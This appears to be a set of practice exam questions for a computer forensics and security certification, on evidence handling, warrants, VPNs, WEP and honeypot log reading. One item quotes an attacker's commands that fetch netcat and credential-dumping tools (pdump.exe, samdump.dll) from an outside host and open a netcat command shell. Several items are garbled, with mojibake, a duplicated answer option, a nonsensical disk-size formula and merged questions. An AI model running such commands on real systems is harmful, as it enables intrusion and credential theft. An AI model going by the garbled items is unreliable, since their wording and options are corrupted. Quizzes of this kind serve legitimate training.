Which part of the Windows Registry contains the user's password file?

HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIGURATION
HKEY_USER
HKEY_CURRENT_USER

In what way do the procedures for dealing with evidence in a criminal case differ from the
procedures for dealing with evidence in a civil case?
evidence in a civil case must be secured more tightly than in a criminal case
evidence in a criminal case must be secured more tightly than in a civil case
evidence procedures are not important unless you work for a law enforcement agency
evidence must be handled in the same way regardless of the type of case

Which of the following are a benefit of removing unused or unneeded services and protocols?
Less need for administration
More machine resource availability
More Security
More network through put

The act of attempting to appear to be someone you’re not in order to gain access to a system
is known as which of the following?
Sniffing
Spoofing
Replay
DDoS

The MD5 program is used to:

view graphics files on an evidence drive
wipe magnetic media before recycling it
make directories on a evidence disk
verify that a disk is not altered when you examine it

To allow its employees remote access to the corporate network, a company has implemented
a hardware VPN solution. Why is this considered a secure remote access solution?
Because VPNs use the internet to transfer data
Because only the company's employees will know the address to connect to in order to use
the VPN
Because a VPNs uses encryption to make its data secure
Because a VPNs uses compression to make its data secure

Josh has asked for a clerification of what a firmware update is. How could you briefly
describe for him the purpose of firmware updates? (Pick the best answer)
Firmware updates update the mechanical function of the device
Firmware updates ate minor fixes, and are not usually necessary
Firmware updates are device-spesific command sets that must be upgrade to continue
operation
Firmware updates are control software- or BIOS-type updates that are installed to improve
the functionality or extend the life of the device involved
The use of VPNs and _______ have enabled users to be able to telecommute
PGP
Wireless NICs
S/MIME
RASs

When obtaining a warrant it is important to:

generally describe the place to be searched and particularly describe the items to be seized
generally describe the place to be searched and generally describe the items to be seized
particularly describe the place to be searched and generally describe the items to be seized
particularly describe the place to be searched and particularly describe the items to be seized

There are three recognize levels of hacking ability in the internet community. The first is the
skilled hacker, who writes the programs and scripts that script kiddies use for their attacks.
Next comes the script kiddie, who knows how to run the scripts written by the skilled
hackers. After the script kiddies come the _______, who lack the basic knowledge of
networks and security to lunch an attack themselves
Dunce kiddies
Web kiddies
Clickers
Click kiddies

Which is the most important reason for the removal of unused, unnecessary, or unneeded
protocols, services, andapplications?
Less machine resource use
Increased performance
Less need for administration
Increased security

If a suspect computer is located in an area that may have toxic chemicals, you must:
determine a way to obtain the suspect computer
coordinate with the HAZMAT team
assume the suspect machine is contaminated
do not enter alone

What happens when a file is deleted by a Microsoft operating system using the FAT file
system?
the file is erased and cannot be recovered
the file is erased but can be recovered
a copy of the file is stored and the original file is erased
only the reference to the file is removed from the FAT

In a computer forensics investigation, what describes the route that evidence takes from the
time you find it until the case is closed or goes to court?
chain of custody
policy of separation
rules of evidence
law of probability
When you use Java, the JVM isolates the Java applet to a sandbox when it executes. What
does this do to provide additional security
This prevents the Java applet from communicationg to servers other than the one from which
it was downloaded
This prevents the Java applet from failing in such a way ta=hat the Java applet is unable to
execute
This prevents the Java applet from failing in such a way that it affects another application
This prevents the Java applet from accessing data on the client's hard drive

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given
below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried
out by the attacker by studying the log. Please note that you are required to infer only what is
explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive
OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures
from a sniff dump.) 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+=+=
+
03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a;
69 64 3B id;
The attacker has used a Trojan on port 32773
The attacker has used a Trojan on port 32773
The attacker has scanned and exploited the system using Buffer
The attacker has conducted a network sweep on port 111
When monitoring for both intrusion and security events between multiple computers, it is
essential that the computers' clocks are synchronized. Synchronized time allows an
administrator to reconstruct what took place during an attack against multiple computers.
Without synchronized time, it is very difficult to determine exactly when specific events took
place, and how events interlace. What is the name of the service used to synchronize time
among multiple computers?
Universal Time Set
Network Time Protocol
SyncTime Service
Time-Sync Protocol

E-mail log does not contain which of the following information to help you in your
investigation?
(Select up to 4)
e-mail message (log¤¤¨S¦³attach¸ê®Æ)
user account that was used to send the account
contents of the e-mail message
unique message identifier

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not
normally
have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in
displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS
vulnerability
allows a malicious user to construct SQL statements that will execute shell commands (such
as
CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and
a
query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query
which
results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
The attack is a remote exploit and the hacker downloads three files
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
There are two attackers on the system - johna2k and haxedj00
It is a local exploit where the attacker logs in using username johna2k
When investigating a potential e-mail crime, what is your first step in the investigation?
Determine whether a crime was actually committed
Trace the IP address to its origin
Recover the evidence
Write a report

You are contracted to work as a computer forensics investigator for a regional bank that has
four
30 TB storage area networks that store customer data. What method would be most efficient
for
you to acquire digital evidence from this network?
make a bit-stream disk-to-disk file
create a compressed copy of the file with DoubleSpace
create a sparse data copy of a folder or file
make a bit-stream disk-to-image file

You are assigned to work in the computer forensics lab of a state police agency. While
working on a high profile criminal case, you have followed every applicable procedure,
however your boss is still concerned that the defense attorney might question weather
evidence has been changed while at the lab. What can you do to prove that the evidence is the
same as it was when it first entered the lab?
sign a statement attesting that the evidence is the same as it was when it entered the lab
make an MD5 hash of the evidence and compare it with the original MD5 hash that was
taken when the evidence first entered the lab
make an MD5 hash of the evidence and compares it to the standard database developed by
NIST
there is no reason to worry about this possible claim because state labs are certified

You are setting up a test plan for verifying thta new code being placed on a Web server is
secure and does not cause any problems with the production Web server. What is the best
way to test the code prior to deploying it to the production Web server?
Test all new code on a duplicate web server prior to transferring it to the production web
server
Test all new code on an active internal Web sever prior to transferring it to the production
web server
Test all new code on another user's PC prior to transferring it to the production web server
Test all new code on a development PC prior to transferring it to the production Web server

Which of the following is the best way to protect your organization from revealing sensitive
information through dumpster diving?
Shared all sensitive documentation
Establish a policy requiring employees to change passwords every 30 to 60 days
Teach employees the value of not disclosing restricted information over the telephone to
unknown parties
Add a new firewall to the network
The network team at your company has placed a sniffer on the network to analyze an ongoing
network-related problem. The team connects to the sniffer using Telnet to view the data
going accross the network. What would you recommend to increase the security of this
connection without making it significantly more difficult for the network team members to do
their jobs?
Use SSH to make the connection to the sniffer rather than Telnet
Require the network team to view the data from the local console of the sniffer
Encrypt the connection to the sniffer using PAP
Require the network team to remove the sniffer immediately

The component of a DDoS attack that sends commands to DDoS zombie agents is known as
a _____.
Master
Console
System Commander
Rootkit
You are working as an investigator for a corporation and you have just received instructions
from your manager to assist in the collection of 15 hard drives that are part of an ongoing
investigation.
Your job is to complete the required evidence custody forms to properly document each piece
of evidence as it is collected by other members of your team. Your manager instructs you to
complete one multi-evidence form for the entire case and a single-evidence form for each
hard drive. How will these forms be stored to help preserve the chain of custody of the case?
The multi-evidence form should be placed in an approved secure container with the hard
drives and the single-evidence forms should be placed in the report file.
All forms should be placed in an approved secure container because they are now primary
evidence in the case.
The multi-evidence form should be placed in the report file and the single-evidence forms
should be kept with each hard drive in an approved secure container.
All forms should be placed in the report file because they are now primary evidence in the
case.

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and
digital video discs (DVDs) by using a large magnet. You inform him that this method will not
be effective in wiping out the data because CDs and DVDs are______________ media used
to store large amounts of data and are not affected by the magnet.
anti-magnetic
magnetic
optical
logical

What file structure database would you expect to find on floppy disks?
NTFS
FAT 12
Fat 32
Fat 16
Before you are called to testify as an expert, what must an attorney do first?
read your curriculum vitae to the jury
engage in damage control
qualify you as an expert witness
prove that the tools you used to conduct your examination are perfect

When examining a file with a Hex Editor, what space does the file header occupy?
the first several bytes of the file
none, file headers are contained in the FAT
the last several bytes of the file
one byte at the beginning of the file

It has been discovered that a former member of the IT department who switched to the
development team still has administrative access to many major network infrastructure
devices and servers. Which of the following mitigation techniques should be implemented to
help reduce the risk of this event recurring?
Incident management and response policy
Change management notifications
DLP
Regular user permission and rights reviews

Sally has come to you for advice and guidance. She is trying to configure a network device to
block attempts to connect on certain ports, but when she finishes the configuration, it works
for a period of time but them changes back to the original configuration. She cannot
understand why the setting continue to change back. When you examine the configuration,
you find that the _______ are incorrect, and are allowing Bob to change the configuration,
although he is not supposed to operate or configure this device. Since he did not know avout
Sally, he kept changing the configuration back.
DAC settings
ACL settings
Permissions
MAC settings

What does the acronym POST mean as it relates to a PC?

Primary Operations Short Test
Pre Operational Situation Test
Power On Self Test
Primary Operating System Test

What binary coding is used most often for e-mail purposes?

UuenCode
MIME
SMTP
IMAP

Corporate investigations are typically easier than public investigations because ...
the users have standard corporate equipment and software
the users can load whatever they want on their machines
the investigator does not have to get a warrant
the investigator has to get a warrant
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that
you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
Boot sys
deltree command
CMOS
Scandisk utility

Lance wants to place a honeypot on his network. Which of the following would be your
recommendations?
Use a system that is not directly interacting with the router
Use a system that has a dynamic addressing on the network
Use it on a system in an external DMZ in front of the firewall
It doesn't matter as all replies are faked

It takes_____________ mismanaged case/s to ruin your professional reputation as a computer

forensics examiner?
quite a few
by law, three
only one
at least two

Which of the following is a weakness in WEP related to the IV? (Select all that apply)
The IV is a static value, which makes it relatively easy for an attacker to brute force the WEP
key from captured traffic
The IV is transmitted in plaintext and can be easily seen in captured traffic
The IV is only 24 bits in size, which makes it possible that two or more data frames will be
trasmitted with the same IV, thereby resulting in an IV collision that an attacker can use to
determine information about the network
There is no weakness in WEP related to the IV

During the course of an investigation, you locate evidence that may prove the innocence of
the suspect of the investigation. You must maintain an unbiased opinion and be objective in
your entire fact finding process. Therefore you report this evidence. This type of evidence is
known as:
Inculpatory evidence
mandatory evidence
exculpatory evidence
Terrible evidence

When an investigator contacts by telephone the domain administrator or controller listed by a

whois lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
Title 18, Section 2703(f)
Title 18, Section Chapter 90
Title 18, Section 2703(d)
Title 18, Section 1030
You are creating a DMZ for a company and need to allow eternal users to access Web servers
in the DMZ using HTTP/S as well as allow internal users to access the same Web firewalls to
meet these requirements
Open port 80 on the external firewall and port 110 on the internal firewall
Open port 443 on the external firewall and port 80 on the internal firewall
Open port 80 on the external firewall and port 443 on the internal firewall
Open port 110 on the external firewall and port 80 on the internal firewall

Which of the following protocols can be used to secure a VPN connection?

DNS
AppleTalk
MPPE
TCP/IP

What term is used to describe a cryptographic technique for embedding information into
something else for the sole purpose of hiding that information from the casual observer?
steganography
rootkit
Offset
key escrow

To calculate the number of bytes on a disk, the formula is: CHS**

number of circles x number of halves x number of sides x 512 bytes per sector
number of cylinders x number of halves x number of shims x 512 bytes per sector and
number of cylinders x number of halves x number of shims x 512 bytes per sector number of
cylinders x number of halves x number of shims x 512 bytes per sector
number of cells x number of heads x number of sides x 512 bytes per sector
The answers is wrong

Which of the following is most likely to make systems vulnerable to MITM

attacks?
Weak passwords
Weak TCP sequence number
Use of the wrong operation system
Authentication misconfiguration on routers

PDAs, cell phones, and certain network cards have the ability to use _______ networks.
Choose the BEST answer
Wireless
Wired
Antique
Private
A suspect is accused of violating the acceptable use of computing resources, as he has visited
adult websites and downloaded images. The investigator wants to demonstrate that the
suspect did indeed visit these sites. However, the suspect has cleared the search history and
emptied the
cookie cache. Moreover, he has removed any images he might have downloaded. What can
the
investigator do to prove the violation? Choose the most feasible option.
Approach the websites for evidence
Image the disk and try to recover deleted files
Seek the help of co-workers who are eye-witnesses
Check the Windows registry for connection data (You may or may not recover)